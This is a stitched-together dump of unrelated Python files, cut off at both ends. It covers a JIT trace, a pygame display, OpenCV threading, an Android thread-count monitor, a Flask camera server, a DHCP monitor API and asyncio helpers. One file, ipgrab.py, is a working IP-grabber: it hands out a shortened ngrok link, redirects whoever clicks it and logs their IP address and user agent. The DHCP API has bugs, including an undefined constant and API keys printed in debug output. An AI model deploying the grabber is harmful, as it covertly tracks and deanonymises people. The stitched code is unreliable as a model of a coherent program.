setarrayitem_raw(i150, 0, i106, descr=...)
i153 = int_add(i138, 4)
setarrayitem_raw(i153, 0, i106, descr=...)
p156 = getfield_gc_r(p48, descr=...)
i158 = getfield_raw_i(..., descr=...)
setfield_gc(p48, p49, descr=...)
setfield_gc(p134, ConstPtr(null), descr=...)
i160 = int_lt(i158, 0)
guard_false(i160, descr=...)
jump(..., descr=...)
""")
|
Ports.py
|
import pygame
from PIL import Image
import time
import MotherBoard.util as util
from threading import Thread
buffer = Image.new("RGB",(16,16),"black")
running = True
ports = {0:0, 1:0, 2:0, 3:0, 4:0, 5:0, 6:0, 7:0, 8:0, 9:0, 10:0, 11:0, 12:0, 13:0, 14:0, 15:0}
def screen():
global buffer
global running
pygame.init()
screen = pygame.display.set_mode((640,640))
clock = pygame.time.Clock()
while running:
#clock.tick(10)
for x in xrange(16):
# print RAM[x],ram.read(RAM[x])
q = util.mybin(ports[x])
for y in xrange(16):
buffer.putpixel((y, x), (255 * int(q[y]), 255 * int(q[y]), 255 * int(q[y])))
t = buffer.resize((640,640)).tobytes()
img=pygame.image.frombuffer(t,(640,640),"RGB")
screen.blit(img,(0,0))
pygame.display.flip()
for e in pygame.event.get():
if e.type == pygame.QUIT:
running = False
class Ports:
def __init__(self):
self.TickTime = 0
self.currentTick = 0
self.screenThread = Thread(target=screen)
self.screenThread.start()
print("Initalizing pygame.")
time.sleep(1)
def tick(self, port, prom):
global ports
ports = port
if running == False:
quit()
def CleanUp(self):
pass
|
thread.py
|
import cv2
import threading
import queue
class ThreadingClass:
def __init__(self, name):
self.cap = cv2.VideoCapture(name)
self.q = queue.Queue()
t = threading.Thread(target = self._reader)
t.daemon = True
t.start()
def _reader(self):
while True:
ret, frame = self.cap.read()
if not ret:
break
if not self.q.empty():
try:
self.q.get_nowait()
except queue.Empty:
pass
self.q.put(frame)
def read(self):
return self.q.get()
def release(self):
return self.cap.release()
|
thread_num.py
|
#encoding:utf-8
'''
@author: look
@copyright: 1999-2020 Alibaba.com. All rights reserved.
@license: Apache Software License 2.0
@contact: 390125133@qq.com
'''
import csv
import os
import re
import sys
import threading
import time
import traceback
BaseDir=os.path.dirname(__file__)
sys.path.append(os.path.join(BaseDir,'../..'))
from mobileperf.android.tools.androiddevice import AndroidDevice
from mobileperf.common.utils import TimeUtils
from mobileperf.common.log import logger
from mobileperf.android.globaldata import RuntimeData
class ThreadNumPackageCollector(object):
    def __init__(self, device, packagename, interval=1.0, timeout=24 * 60 * 60, thread_queue=None):
        self.device = device
        self.packagename = packagename
self._interval = interval
self._timeout = timeout
self._stop_event = threading.Event()
self.thread_queue = thread_queue
def start(self,start_time):
logger.debug("INFO: ThreadNum PackageCollector start... ")
self.collect_thread_num_thread = threading.Thread(target=self._collect_thread_num_thread, args=(start_time,))
self.collect_thread_num_thread.start()
def stop(self):
logger.debug("INFO: ThreadNumPackageCollector stop... ")
        if self.collect_thread_num_thread.is_alive():
self._stop_event.set()
self.collect_thread_num_thread.join(timeout=1)
self.collect_thread_num_thread = None
        # when stopping, send a task-done signal so the queue can be drained and closed
if self.thread_queue:
self.thread_queue.task_done()
def get_process_thread_num(self, process):
pid = self.device.adb.get_pid_from_pck(self.packagename)
out = self.device.adb.run_shell_cmd('ls -lt /proc/%s/task' % pid)
collection_time = time.time()
logger.debug("collection time in thread_num info is : " + str(collection_time))
if out:
# logger.debug("thread num out:"+out)
thread_num = len(out.split("\n"))
return [collection_time,self.packagename,pid,thread_num]
else:
return []
def _collect_thread_num_thread(self, start_time):
end_time = time.time() + self._timeout
thread_list_titile = (
"datatime", "packagename", "pid", "thread_num")
thread_num_file = os.path.join(RuntimeData.package_save_path, 'thread_num.csv')
try:
with open(thread_num_file, 'a+') as df:
csv.writer(df, lineterminator='\n').writerow(thread_list_titile)
if self.thread_queue:
thread_file_dic = {'thread_file': thread_num_file}
self.thread_queue.put(thread_file_dic)
except RuntimeError as e:
logger.error(e)
while not self._stop_event.is_set() and time.time() < end_time:
try:
before = time.time()
logger.debug("-----------into _collect_thread_num_thread loop, thread is : " + str(threading.current_thread().name))
                # get the thread num info for the package
thread_pck_info = self.get_process_thread_num(self.packagename)
logger.debug(thread_pck_info)
current_time = TimeUtils.getCurrentTime()
if not thread_pck_info:
continue
else:
logger.debug(
"current time: " + current_time + ", processname: " + thread_pck_info[1]+ ", pid: " + str(thread_pck_info[2]) +
" thread num: " + str(thread_pck_info[3]))
if self.thread_queue:
self.thread_queue.put(thread_pck_info)
                if not self.thread_queue:  # for running this file standalone locally
try:
with open(thread_num_file, 'a+',encoding="utf-8") as thread_writer:
writer_p = csv.writer(thread_writer, lineterminator='\n')
thread_pck_info[0] = current_time
writer_p.writerow(thread_pck_info)
except RuntimeError as e:
logger.error(e)
after = time.time()
time_consume = after - before
delta_inter = self._interval - time_consume
logger.debug("time_consume for thread num infos: " + str(time_consume))
if delta_inter > 0:
time.sleep(delta_inter)
except:
logger.error("an exception hanpend in thread num thread, reason unkown!")
s = traceback.format_exc()
logger.debug(s)
if self.thread_queue:
self.thread_queue.task_done()
class ThreadNumMonitor(object):
def __init__(self, device_id, packagename, interval = 1.0, timeout=24*60*60,thread_queue = None):
self.device = AndroidDevice(device_id)
if not packagename:
packagename = self.device.adb.get_foreground_process()
self.thread_package_collector = ThreadNumPackageCollector(self.device, packagename, interval, timeout,thread_queue)
def start(self,start_time):
self.start_time = start_time
self.thread_package_collector.start(start_time)
def stop(self):
self.thread_package_collector.stop()
def save(self):
pass
if __name__ == "__main__":
monitor = ThreadNumMonitor("","com.yunos.tv.alitvasr",3)
monitor.start(TimeUtils.getCurrentTime())
time.sleep(20)
monitor.stop()
# monitor.save()
|
web.py
|
#!/usr/bin/env python3
from inspect import currentframe
from flask import Flask, render_template, Response
import re
import cv2
import depthai as dai
import numpy as np
from multiprocessing.pool import ThreadPool
import threading
from queue import Queue
from collections import deque
import time
import base64
from flask_socketio import SocketIO, emit
app = Flask(__name__)
socketio = SocketIO(app)
# Create pipeline
pipeline = dai.Pipeline()
# Define source and output
camRgb = pipeline.createColorCamera()
xoutRgb = pipeline.createXLinkOut()
xoutRgb.setStreamName("rgb")
# Properties
camRgb.setPreviewSize(1920, 1080)
camRgb.setInterleaved(False)
camRgb.setColorOrder(dai.ColorCameraProperties.ColorOrder.RGB)
# Linking
camRgb.preview.link(xoutRgb.input)
global first_iter
global points
global currFrame
global final
threadn = cv2.getNumberOfCPUs()
pool = ThreadPool(processes = threadn)
pending = deque()
video = deque()
class Filter():
def procs(frame):
hsv = pool.apply_async(Filter.hsv, (frame,))
pending.append(hsv)
hsv = pending.popleft().get()
# Threshold the HSV image to get only white colors
mask = pool.apply_async(Filter.mask, (hsv,))
pending.append(mask)
mask = pending.popleft().get()
# Bitwise-AND mask and original image
res = cv2.bitwise_and(frame,frame, mask= mask)
contours = pool.apply_async(Filter.contours, (mask,))
pending.append(contours)
contours = pending.popleft().get()
#sorting the contour based of area
tracked = frame.copy()
return tracked, res
def hsv(frame):
hsv = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)
return hsv
def mask(hsv):
lower_white = np.array([2, 48, 125], dtype=np.uint8)
upper_white = np.array([81, 255, 255], dtype=np.uint8)
mask = cv2.inRange(hsv, lower_white, upper_white)
return mask
def contours(mask):
contours, _ = cv2.findContours(mask, cv2.RETR_TREE, cv2.CHAIN_APPROX_NONE)
contours = sorted(contours, key=cv2.contourArea, reverse=True)
return contours
class Display():
def videoStream(name, frame):
cv2.imshow(name, frame)
# cv2.imshow(name, video.get(block=False))
def main():
# used to record the time when we processed last frame
prev_frame_time = 0
# used to record the time at which we processed current frame
new_frame_time = 0
avgFPS = 1
framerate = []
threadn = cv2.getNumberOfCPUs()
pool = ThreadPool(processes = threadn)
process = deque()
# Connect to device and start pipeline
with dai.Device(pipeline) as device:
print('Connected cameras: ', device.getConnectedCameras())
# Print out usb speed
print('Usb speed: ', device.getUsbSpeed().name)
qRgb = device.getOutputQueue(name="rgb", maxSize=4, blocking=False)
print(np.shape(qRgb))
frame = None
first_iter = True
points = []
while True:
while len(process) > 0 and process[0].ready():
tracked, res = process.popleft().get()
if res is not None:
new_frame_time = time.time()
fps = 1/(new_frame_time-prev_frame_time)
prev_frame_time = new_frame_time
fps = int(fps)
framerate.insert(0, fps)
avgFPS = str(int(sum(framerate)/len(framerate))+1)
if len(framerate) > 10:
del framerate[len(framerate)-1]
print(avgFPS)
# if (1/(new_frame_time-prev_frame_time) > 120):
# # video.put(res)
# stream = threading.Thread(target=Display.videoStream, args=("video", res))
# stream.start()
cv2.putText(res, avgFPS, (7, 70), cv2.FONT_HERSHEY_SIMPLEX, 2, (100, 200, 100), 2, cv2.LINE_AA)
cv2.putText(tracked, avgFPS, (7, 70), cv2.FONT_HERSHEY_SIMPLEX, 2, (100, 200, 100), 2, cv2.LINE_AA)
cv2.imshow('threaded video', tracked)
cv2.imshow('threaded mask', res)
# stream = pool.apply_async(Display.videoStream, ("threaded video", res))
# video.append(stream)
# # stream = process.popleft().get()
currFrame = res
if len(process) < threadn:
inRgb = qRgb.tryGet()
if inRgb is not None:
frame = inRgb.getCvFrame()
if frame is not None:
frame = frame
if (int(avgFPS) < 60):
task = pool.apply_async(Filter.procs, (frame,))
process.append(task)
key = cv2.waitKey(1)
if key == ord('q'):
break
# @app.route('/video_feed')
# def video_feed():
# #Video streaming route. Put this in the src attribute of an img tag
# return Response(main(), mimetype='multipart/x-mixed-replace; boundary=frame')
@socketio.on("request-frame", namespace="/camera-feed")
def camera_frame_requested(message):
frame = currFrame
if frame is not None:
emit("new-frame", {
"base64": base64.b64encode(frame).decode("ascii")
})
@app.route('/')
def index():
"""Video streaming home page."""
return render_template('index.html')
if __name__ == "__main__":
# app.run(debug=True)
socketio.run(app, host="0.0.0.0", port=8080, threaded=True)
# main()
# cv2.destroyAllWindows()
|
endpoints.py
|
import os
import sys
import json
from flask import request, Blueprint, Response
from flask_cors import cross_origin
from concurrent.futures import ThreadPoolExecutor
from multiprocessing import Process
from dhcp_monitor.command_scripts.stream_handler import StreamHandler
from dhcp_monitor.data_manipulation.dump_message_handler import DataHandler
from dhcp_monitor.command_scripts.log_handler import LogHandler
from config import KEA_LOGPATH, DUMP_PATH, DUMP_INTERFACE, REQUIRE_API_AUTHENTICATION
from utils import MONITOR_LOGGER, check_path
MONITOR_BP = Blueprint('dhcp_monitor', __name__, url_prefix='/monitor')
SERVICE_CODE = "000"
STATUS_OK = "OK"
STATUS_KO = "KO"
HTTP_200 = 200 # Success
HTTP_400 = 404 # Bad request
HTTP_401 = 401 # None or bad credentials sent
HTTP_500 = 500 # General internal server error
SUCCESS_1000 = "1000"
SUCCESS_1000_VALUE = "Command execution successful"
ERROR_4000 = "4000"
ERROR_4000_VALUE = "Exception occured in the server. Command unsuccessful"
ERROR_4001 = "4001"
ERROR_4001_VALUE = "Could not find JSON key"
PACKET_CAPTURE_PID_FILE = 'packet_monitor.pid'
stream_instance = StreamHandler(dump_path=DUMP_PATH, dump_if=DUMP_INTERFACE)
log_handler_instance = LogHandler(logfile=KEA_LOGPATH)
log_map_handler = DataHandler(log_handler_instance)
data_handler = DataHandler(stream_instance)
# Check for API keys if REQUIRE_API_AUTHENTICATION is enabled in the config
if REQUIRE_API_AUTHENTICATION:
GET_AUTH_TOKEN_API = '111'
ERROR_5000 = "5000"
ERROR_5000_VALUE = "Invalid request"
ERROR_5001 = "5001"
ERROR_5001_VALUE = "Could not find API key in request"
ERROR_5002 = "5002"
ERROR_5002_VALUE = "Incorrect API key"
# This function will be called every time a request is received. In case
# the request is a GET, then apikey is extracted from the GET request and
# checked for validity. Other requests are handled similarly.
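    # A hedged sketch of what authenticated requests could look like
    # ("SECRET" is a placeholder API key, not a real value):
    #
    #   GET  /monitor/status?apikey=SECRET
    #   POST /monitor/get_rows  with JSON body {"apikey": "SECRET", "offset": 0, "count": 10}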
    @MONITOR_BP.before_request
    def check_auth():
        print("DEBUG: request.endpoint = " + str(request.endpoint))
        MONITOR_LOGGER.debug("request.endpoint = " + str(request.endpoint))
        if request.endpoint == "dhcp4.home":
            return
        # If request method is POST
        if request.method == 'POST':
            print("DEBUG: request is POST")
            MONITOR_LOGGER.debug("DEBUG: request is POST")
            # Extract POST data, look for API key and handle verification
            json_req_data = request.get_json()
            # If no JSON POST request data is found, then return error
            if not json_req_data:
                MONITOR_LOGGER.info("Error - No JSON data")
                print("Error - No JSON data")
                response = response_generator(
                    STATUS_KO,
                    HTTP_400,
                    SERVICE_CODE + CHECK_AUTH_API + ERROR_5000,
                    ERROR_5000_VALUE,
                    {'error': ERROR_5000_VALUE})
                MONITOR_LOGGER.error("JSON ERROR - > %s", ERROR_5000_VALUE)
                return response
            # If JSON POST request data is found, then ...
            else:
                # If API key is found in JSON data then ...
                if "apikey" in json_req_data:
                    apikey = json_req_data['apikey']
                    print("DEBUG: apikey = " + str(apikey))
                    verify_value = verify_api_key(apikey)
                    print("DEBUG: verify_value = " + str(verify_value))
                    # If API key is incorrect, send an error back
                    if verify_value == False:
                        MONITOR_LOGGER.error("JSON ERROR - > %s", ERROR_5000_VALUE)
                        return return_incorrect_api_key()
                else:
                    print("DEBUG: Could not find API key in request")
                    MONITOR_LOGGER.error("JSON ERROR - > %s", ERROR_5001_VALUE)
                    return return_no_api_key_found()
        if request.method == 'GET':
            print("DEBUG: request is GET")
            # Extract GET arguments, look for API key and handle verification
            api_key = request.args.get('apikey')
            print("DEBUG: api_key = " + str(api_key))
            MONITOR_LOGGER.debug("DEBUG: api_key = " + str(api_key))
            # If no apikey is found then return error
            if api_key is None:
                return return_no_api_key_found()
            else:
                print("DEBUG: api_key = " + str(api_key))
                MONITOR_LOGGER.debug("DEBUG: api_key = " + str(api_key))
                verify_value = verify_api_key(api_key)
                print("DEBUG: check_auth(): verify_value = " +
                      str(verify_value))
                MONITOR_LOGGER.debug("DEBUG: check_auth(): verify_value = " +
                                     str(verify_value))
                if verify_value == False:
                    print("DEBUG: check_auth(): returning incorrect api key "
                          "response")
                    MONITOR_LOGGER.debug("DEBUG: check_auth(): returning incorrect "
                                         "api key response")
                    return return_incorrect_api_key()
# Implement other methods here
def return_no_api_key_found():
response = response_generator(STATUS_KO, HTTP_400,
SERVICE_CODE + CHECK_AUTH_API + ERROR_5001,
ERROR_5001_VALUE, {'error': ERROR_5001_VALUE})
return response
def return_incorrect_api_key():
response = response_generator(STATUS_KO, HTTP_401,
SERVICE_CODE + CHECK_AUTH_API + ERROR_5002, ERROR_5002_VALUE,
{'error': ERROR_5002_VALUE})
return response
def start_threads():
try:
with ThreadPoolExecutor(max_workers=min(32, os.cpu_count() + 4), thread_name_prefix='pooler') as executor:
MONITOR_LOGGER.info("Starting log map handler")
            executor.submit(log_map_handler.print_tail)
MONITOR_LOGGER.info("Starting data handler")
            executor.submit(data_handler.create_dataframe)
MONITOR_LOGGER.info("Done")
return {'data': 'success', 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
def check_trigger_status():
return check_path(PACKET_CAPTURE_PID_FILE)
@MONITOR_BP.route('/status', methods=['GET'])
@cross_origin()
def status():
try:
return {'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/', methods=['GET'])
@cross_origin()
def home():
try:
return {'data': 'DHCP Monitor up.', 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/get_rows', methods=['POST'])
@cross_origin()
def rows():
try:
req = request.get_json()
data = data_handler.get_rows(int(req['offset']), int(req['count']))
return data
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/trigger', methods=['GET'])
@cross_origin()
def trigger():
try:
if check_trigger_status():
return {'triggered': check_trigger_status()}
data_handler.reset_dump_collection_file()
MONITOR_LOGGER.info("Starting log map handler")
dump_process = Process(target=start_threads)
dump_process.start()
with open(PACKET_CAPTURE_PID_FILE, 'w') as file:
MONITOR_LOGGER.info('Writing to file - DUMP Process PID -> %s', dump_process.pid)
file.write(str(dump_process.pid))
MONITOR_LOGGER.info("Starting data handler")
return {'data': 'success', 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/terminate', methods=['GET'])
@cross_origin()
def terminate():
print('hi')
MONITOR_LOGGER.info("Getting global variable")
try:
MONITOR_LOGGER.info("Stopping now")
if check_trigger_status():
MONITOR_LOGGER.info("Trigger found")
with open(PACKET_CAPTURE_PID_FILE) as file:
pid = file.read()
MONITOR_LOGGER.info('DUMP Process PID from FILE -> %s', pid)
os.kill(int(pid), 9)
os.remove(PACKET_CAPTURE_PID_FILE)
MONITOR_LOGGER.info("Dump terminated")
else:
MONITOR_LOGGER.info("No Trigger found")
return {'data': 'success', 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
@MONITOR_BP.route('/row_count', methods=['GET'])
@cross_origin()
def row_count():
try:
MONITOR_LOGGER.debug("Getting row count")
data = data_handler.row_count()
if isinstance(data, int):
return {'data': data, 'triggered': check_trigger_status()}
else:
return {'error': data, 'triggered': check_trigger_status()}
except Exception as excp:
return {'error': repr(excp), 'triggered': check_trigger_status()}
def response_generator(status, http_code, output_code, output_value, data):
""" Response formatted to suit fast core """
MONITOR_LOGGER.info('Executing')
return_value = {
"status": status,
'statusCode': output_code,
'statusValue': output_value,
'data': data
}
json_return_value = json.dumps(return_value)
MONITOR_LOGGER.info("json_return_value = %s", str(json_return_value))
response = Response(json_return_value, status=http_code,
mimetype='application/json')
MONITOR_LOGGER.info('Returning %s', str(return_value))
return response
|
ipgrab.py
|
# By Luiz Viana
import argparse
from http.server import HTTPServer, BaseHTTPRequestHandler
import time
import os
import requests
from threading import Thread
import platform
parser = argparse.ArgumentParser(description="IP grabber NGROK")
parser.add_argument('-u', '--redirect-url', type=str, required=True, help="URL to redirect")
parser.add_argument('-p', '--port', type=int, default=8181, help="HTTP Server port")
parser.add_argument('-n', '--ngrok-path', type=str, default='ngrok', help="NGROK path")
parser.add_argument('-o', '--output-file', type=str, help="output file path")
args = parser.parse_args()
save = 0 # count connections
iplist = [] # IP log
def redirect():
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', args.redirect_url)
self.end_headers()
def log_message(self, format, *args):
return
HTTPServer(("", int(args.port)), Redirect).serve_forever()
def logip():
global iplist
c = 0
r = requests.get('http://localhost:4040/api/requests/http').json()
if args.output_file:
log = open(args.output_file, "a+")
for i in r['requests']:
if r['requests'][c]['request']['headers']['X-Forwarded-For'][0] not in iplist:
ip = r['requests'][c]['request']['headers']['X-Forwarded-For'][0]
iplist.append(ip)
useragent = r['requests'][c]['request']['headers']['User-Agent'][0]
date = r['requests'][c]['start']
info = "[ + ] REQUEST ID: {}\n[ + ] Date: {}\n[ + ] IP ADDRESS: {}\n[ + ] User Agent: {}".format(
iplist.index(ip),
date, ip,
useragent)
print(info)
if args.output_file:
log.write(info)
log.close()
c += 1
def verifyconnection():
global save
while True:
try:
r = requests.get("http://127.0.0.1:4040/api/tunnels/command_line%20(http)").json()
count = r['metrics']['conns']['count']
if count > save:
save = count
logip()
except:
pass
time.sleep(5)
def startngrok():
try:
if platform.system() == "Windows":
os.system("start {} http {}".format(args.ngrok_path, args.port))
else:
os.system("{} http {} > /dev/null &".format(args.ngrok_path, args.port))
print("[ ... ] Starting ngrok [ ... ] \n")
time.sleep(3)
r = requests.get('http://127.0.0.1:4040/api/tunnels').json()
url = r['tunnels'][0]['public_url'].replace("https://", "http://")
print("[ $ ] Use this url: {} [ you can shorten it ;) ]\n".format(url))
print("[ ! ] Waiting for the click [ ? ]\n")
except:
print("[ # ] Something is wrong.")
quit()
if __name__ == "__main__":
startngrok()
webserv = Thread(target=redirect)
webserv.start()
verifyconnection()
|
screen_interface.py
|
import threading
from rich import print as pr
import sys
import socket
import enum
import os
class TypeMessage(enum.Enum):
PRINT="[print]"
INPUT="[input]"
BASE ="[basic]"
CLOSE="[close]"
class Screen:
def __init__(self, prt: int) -> None:
self.port = prt
self.accept_input = False
def connect(self):
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def getin():
resp = input(">>> ")
client.send(resp.encode())
try:
client.connect(("127.0.0.1", self.port))
client.send(str(os.getpid()).encode())
while 1:
res = client.recv(1024).decode().rstrip("\x00")
typ, msg = res[:len(TypeMessage.BASE.value)], res[len(TypeMessage.BASE.value):]
if len(msg)>0 and msg != "ping":
pr(msg)
if typ == TypeMessage.CLOSE.value:
client.close()
sys.exit(0)
elif typ == TypeMessage.INPUT.value:
threading.Thread(target=getin).start()
except:
sys.exit(-1)
if len(sys.argv) > 1:
try:
port = int(sys.argv[1])
scrn = Screen(port)
scrn.connect()
except:
sys.exit(-1)
|
asyncio_util.py
|
# Copyright (c) 2017-2021 Digital Asset (Switzerland) GmbH and/or its affiliates. All rights reserved.
# SPDX-License-Identifier: Apache-2.0
"""
This module contains utilities to help work with ``asyncio``.
"""
from asyncio import (
AbstractEventLoop,
AbstractEventLoopPolicy,
CancelledError,
Future,
InvalidStateError,
Queue as AQueue,
ensure_future,
gather,
get_event_loop,
new_event_loop,
)
from dataclasses import dataclass
from functools import partial, wraps
from inspect import isawaitable, iscoroutinefunction
from queue import Queue
import sys
import threading
from typing import (
Any,
Awaitable,
Callable,
Generator,
Generic,
Iterable,
List,
Optional,
Sequence,
Tuple,
TypeVar,
Union,
cast,
no_type_check,
)
import warnings
from .. import LOG
from ..prim.datetime import TimeDeltaLike, to_timedelta
T = TypeVar("T")
T_co = TypeVar("T_co", covariant=True)
U = TypeVar("U")
_PENDING = "PENDING"
_CANCELLED = "CANCELLED"
_FINISHED = "FINISHED"
def non_reentrant(async_fn):
if not iscoroutinefunction(async_fn):
raise ValueError("expected a coroutine function")
calls = []
@wraps(async_fn)
async def _wrap(*args, **kwargs):
if not calls:
calls.append(None)
try:
return await async_fn(*args, **kwargs)
finally:
calls.pop()
else:
            raise InvalidStateError("calls to %r cannot be re-entrant" % (async_fn,))
return _wrap
def isolated_async(async_fn):
"""
Wrap an async function in a thread with its own event loop.
This function runs by itself in an event loop created specifically for this object on its own thread.
This function can be used as a decorator to convert an ``async def`` method to a simple method that blocks while
executing the method on a background thread.
:param async_fn:
The ``async`` function to invoke.
:return:
A function that, when invoked, passes its parameters to the underlying function on a background thread in an
isolated event loop.
"""
queue = Queue()
@wraps(async_fn)
def invoke(*args, **kwargs):
"""
Invoke the wrapped ``async`` method on a background thread, passing in the specified
arguments, and returning the value that the wrapped method returns, or raises an Exception
if the ``async`` function throws.
:param args: The positional arguments to pass.
:param kwargs: The keyword arguments to pass.
:return: The value from the ``async`` function.
"""
thread = threading.Thread(target=partial(_main, args, kwargs))
thread.start()
thread.join()
result, typ, value, traceback = queue.get()
if typ is not None:
# if we have exception information, then an exception was thrown; rethrow it
            raise value.with_traceback(traceback)
else:
# we don't have an exception, so assume the result is what we need to pass back
return result
def _main(args, kwargs):
try:
loop = new_event_loop()
result = loop.run_until_complete(async_fn(*args, **kwargs))
loop.close()
queue.put_nowait((result, None, None, None))
except:
typ, value, traceback = sys.exc_info()
queue.put_nowait((None, typ, value, traceback))
return invoke
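# Illustrative sketch (not part of the original module): isolated_async turns an async
# function into an ordinary blocking call that runs on its own thread and event loop.
def _example_isolated_async():
    from asyncio import sleep

    @isolated_async
    async def compute(x):
        await sleep(0)
        return x * 2

    # blocks the calling thread until the coroutine finishes on the background loop
    return compute(21)  # -> 42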
def await_then(awaitable: "Awaitable[T_co]", func: "Callable[[T_co], U]") -> "Awaitable[U]":
"""
Call a function on the result of an Awaitable, and then return an Awaitable that is resolved
with that result.
If the Awaitable is already "done", then the function is invoked immediately with the result
of that Awaitable and an immediately-completed Future is returned with the result of that
callback.
If either the Awaitable or the function throws an exception, that is returned as a failed
Future. If the Awaitable is cancelled, the returned Future is also cancelled.
:param awaitable:
:param func:
:return:
"""
try:
fut = ensure_future(awaitable)
except TypeError:
raise TypeError(f"expected a valid awaitable (got {awaitable} instead)")
if fut.done():
if fut.cancelled() or fut.exception() is not None:
return fut # type: ignore
else:
try:
return completed(func(fut.result()))
except Exception as ex:
fut = get_event_loop().create_future() # type: ignore
fut.set_exception(ex)
return fut # type: ignore
else:
g = get_event_loop().create_future()
def _propagate(_):
if fut.cancelled():
g.cancel()
elif fut.exception() is not None:
g.set_exception(fut.exception())
else:
try:
g.set_result(func(fut.result()))
except Exception as ex2:
g.set_exception(ex2)
fut.add_done_callback(_propagate)
return g # type: ignore
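# Illustrative sketch (not part of the original module): await_then chains a plain
# function onto an awaitable without an explicit intermediate await.
async def _example_await_then():
    async def produce():
        return 20

    doubled = await await_then(produce(), lambda value: value * 2)
    return doubled  # -> 40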
@dataclass
class FailedInvocation:
"""Marker used within execute_in_loop to propagate exceptions thrown
by coro_fn through the result queue in a way that can be easily detected
by the queue's reader.
"""
ex: Exception
def execute_in_loop(
loop: AbstractEventLoop,
coro_fn: "Callable[[], Union[Awaitable[T_co], T_co]]",
timeout: "Optional[TimeDeltaLike]" = 30.0,
) -> T_co:
"""
Run a coroutine in a target loop. Exceptions thrown by the coroutine are
propagated to the caller. Must NOT be called from a coroutine on the same
loop!
:param loop:
:param coro_fn:
:param timeout: Seconds to wait for the termination of the coroutine.
:return: The return value from the coroutine.
"""
q = Queue() # type: ignore
def coro_fn_complete(fut):
LOG.debug("coro_fn_complete: %s", fut)
if fut.exception() is None:
q.put_nowait(fut.result())
else:
q.put_nowait(FailedInvocation(fut.exception()))
@wraps(coro_fn)
def run():
if iscoroutinefunction(coro_fn):
fut = ensure_future(coro_fn())
fut.add_done_callback(lambda _: coro_fn_complete(fut))
elif isawaitable(coro_fn):
fut = ensure_future(coro_fn)
fut.add_done_callback(lambda _: coro_fn_complete(fut))
elif callable(coro_fn):
result = coro_fn()
if isawaitable(result):
fut = ensure_future(result)
fut.add_done_callback(lambda _: coro_fn_complete(fut))
else:
q.put_nowait(result)
else:
raise ValueError("Received an unknown kind of callback")
loop.call_soon_threadsafe(run)
timeout_in_seconds = to_timedelta(timeout).total_seconds()
result = q.get(timeout=timeout_in_seconds)
if isinstance(result, FailedInvocation):
raise result.ex
return result
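# Illustrative sketch (not part of the original module): execute_in_loop hands work to a
# loop owned by another thread and blocks the calling thread until the result is ready.
def _example_execute_in_loop():
    from asyncio import sleep

    loop = new_event_loop()
    worker = threading.Thread(target=loop.run_forever, daemon=True)
    worker.start()

    async def compute():
        await sleep(0)
        return 42

    try:
        return execute_in_loop(loop, compute, timeout=5.0)  # -> 42
    finally:
        loop.call_soon_threadsafe(loop.stop)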
def completed(value, loop=None) -> Future:
if loop is None:
loop = get_event_loop()
fut = loop.create_future()
fut.set_result(value)
return fut
def failed(exception: BaseException, loop=None) -> Future:
if loop is None:
loop = get_event_loop()
fut = loop.create_future()
fut.set_exception(exception)
return fut
def propagate(from_: Future, to: Future) -> None:
"""
Copy the value that ``from_`` is completed with to ``to``, whenever ``from_`` is completed.
"""
if from_.done():
copy_result(from_, to)
else:
from_.add_done_callback(lambda _: copy_result(from_, to))
def copy_result(from_: Future, to: Future) -> None:
if not from_.done():
raise ValueError("from_ must be a completed Future")
if to.done():
raise ValueError("to must NOT be a completed Future")
if from_.cancelled():
to.cancel()
else:
exception = from_.exception()
if exception is not None:
to.set_exception(exception)
else:
result = from_.result()
to.set_result(result)
def to_coroutine(callback: Callable[..., Any]) -> Callable[..., Future]:
"""
Wrap a function or a coroutine, always producing a coroutine.
In other words, for a function like
```
def double(x):
return x + x
```
the result of ``to_coroutine(double)`` would be a function that is equivalent to:
```
async def double(x):
return x + x
```
For functions that are already coroutines, their behavior is unaffected by the wrapper generated
from this function.
:param callback:
The callback to convert to a coroutine.
:return:
A coroutine that calls the specified function.
"""
if not callable(callback):
raise ValueError("callback must be callable")
@wraps(callback)
def invoke_sync(*args, **kwargs) -> Future:
loop = get_event_loop()
try:
result = callback(*args, **kwargs)
if isinstance(result, Future):
return result
else:
future = loop.create_future()
future.set_result(result)
return future
except Exception as ex:
future = loop.create_future()
future.set_exception(ex)
return future
if iscoroutinefunction(callback):
return lambda *args, **kwargs: ensure_future(callback(*args, **kwargs))
else:
return invoke_sync
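# Illustrative sketch (not part of the original module): to_coroutine lets the caller
# await a callback uniformly, whether it was defined as a plain function or an async def.
async def _example_to_coroutine():
    def sync_double(x):
        return x * 2

    async def async_double(x):
        return x * 2

    a = await to_coroutine(sync_double)(4)   # -> 8, via an already-resolved Future
    b = await to_coroutine(async_double)(4)  # -> 8, via ensure_future
    return a, b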
class LongRunningAwaitable:
"""
An :class:`Awaitable` that "finishes" once all of the futures that have been added to it are
finished.
"""
def __init__(self, awaitables: Optional[Iterable[Awaitable[Any]]] = None):
self._fut = get_event_loop().create_future()
self._coros = [] # type: List[Awaitable[Any]]
if awaitables is not None:
self.extend(awaitables)
def append(self, *awaitables: Awaitable[Any]) -> None:
self.extend(awaitables)
def extend(self, awaitables: Iterable[Awaitable[Any]]):
for a in awaitables:
f = ensure_future(a)
f.add_done_callback(self._future_finished)
self._coros.append(f)
def _future_finished(self, fut):
self._coros.remove(fut)
if not self._coros:
self._fut.set_result(None)
def __await__(self):
return self._fut.__await__()
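# Illustrative sketch (not part of the original module): a LongRunningAwaitable resolves
# only after every awaitable handed to it has completed.
async def _example_long_running_awaitable():
    from asyncio import sleep

    tracker = LongRunningAwaitable([sleep(0.01)])
    tracker.append(sleep(0.02))
    await tracker  # resolves once both sleeps have finished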
class ServiceQueue(Generic[T]):
# noinspection PyDeprecation
def __init__(self):
warnings.warn(
"ServiceQueue is deprecated; there is no planned replacement",
DeprecationWarning,
